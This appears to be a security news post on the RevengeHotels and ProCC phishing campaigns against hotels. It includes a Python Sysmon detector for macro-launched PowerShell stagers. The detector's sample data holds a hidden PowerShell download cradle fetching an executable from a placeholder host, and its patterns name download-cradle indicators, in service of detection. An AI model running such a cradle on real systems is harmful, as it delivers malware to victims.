Delaware, USA – November 29, 2019 – The RevengeHotels campaign is conducted by several separate cybercriminal groups that have compromised more than 20 hotels in South and Central America, Europe and Thailand. Kaspersky Lab experts identified two groups with similar Tactics, Techniques, and Procedures that have been active since at least 2015 and increased the intensity of their attacks in 2019. The experts monitored the groups' activities for over a year, tracked the locations of 1400+ potential victims, and found that almost three-quarters of the attacked organizations were located in Brazil, with the remaining hotels and hostels spread across 20+ countries worldwide. The adversaries are after guests' credit card data and the opportunity to sell access to compromised systems.
The first group discovered by Kaspersky Lab was named RevengeHotels, the second ProCC. Both groups use highly targeted phishing emails with malicious attachments and rely heavily on social engineering to convince victims that the emails are genuine. The attackers pose as existing organizations or government entities by registering typo-squatting domains shortly before sending the emails. The text of the email usually refers to booking a large number of rooms for employees. The malicious document executes macro code containing PowerShell commands that download and run the final payload. The RevengeHotels group mainly uses commercial Remote Access Trojans (Revenge RAT, NanoCore RAT, NjRAT) with additional modules for stealing clipboard data and taking screenshots. ProCC created a custom backdoor with similar functionality that is also capable of stealing data from the printer spooler.
Among other things, the attackers seek to obtain credentials for the hotel administration software, since credit card data stolen from there fetches a higher price on carder forums.
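As an added example (not code from the article or from Kaspersky Lab), the following Python scores Sysmon process-creation events for the macro-to-PowerShell download chain described above: an Office application spawning a script host whose command line carries a download or encoded-command indicator. The event records, image paths and the placeholder URL are constructed for the example.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records, shaped like what a log
# forwarder would emit. They are sample data written for this example, not events
# captured from the RevengeHotels or ProCC intrusions.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Word macro launching a hidden PowerShell download cradle
    {"EventID": 1, "ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest -Uri "
                    "http://placeholder.invalid/update.exe -OutFile $env:TEMP\\u.exe\""},
    # Benign: an administrator opening PowerShell from the desktop
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem C:\\Logs"},
    # Excel spawning cmd.exe without download activity: lower-confidence hit
    {"EventID": 1, "ParentImage": OFFICE + r"\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c echo done"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download / decoding indicators commonly found in PowerShell stagers dropped by macros.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                         r"Net\.WebClient|Start-BitsTransfer|-enc(odedcommand)?\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)

def basename(path):
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Reasons a process-creation event looks like a macro-launched stager (empty if none)."""
    if ev.get("EventID") != 1:
        return []
    parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{child}")
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download_cradle_or_encoded_command")
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden_window")
    return reasons

def find_suspicious(events):
    """(child image, reasons) for every flagged event, in input order."""
    return [(basename(ev["Image"]), score_event(ev)) for ev in events if score_event(ev)]
```

Running `find_suspicious(SAMPLE_EVENTS)` flags the Word event with all three reasons and the Excel event with only the parent/child pairing, which is the kind of tiering a detection rule built on the Sysmon content listed below would use.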
Content to detect such attacks:
Nanocore Malware Detector (Sysmon Behavior Analysis) – https://tdm.socprime.com/tdm/info/U0tbIdHrUOeU/
NanoCore RAT (Sysmon) – https://tdm.socprime.com/tdm/info/0XCDttzG23kF/
Revenge RAT tool – https://tdm.socprime.com/att-ck/?tools%5B%5D=S0379
PowerShell technique – https://tdm.socprime.com/att-ck/?techniques%5B%5D=T1086
Template Injection technique – https://tdm.socprime.com/att-ck/?techniques%5B%5D=T1221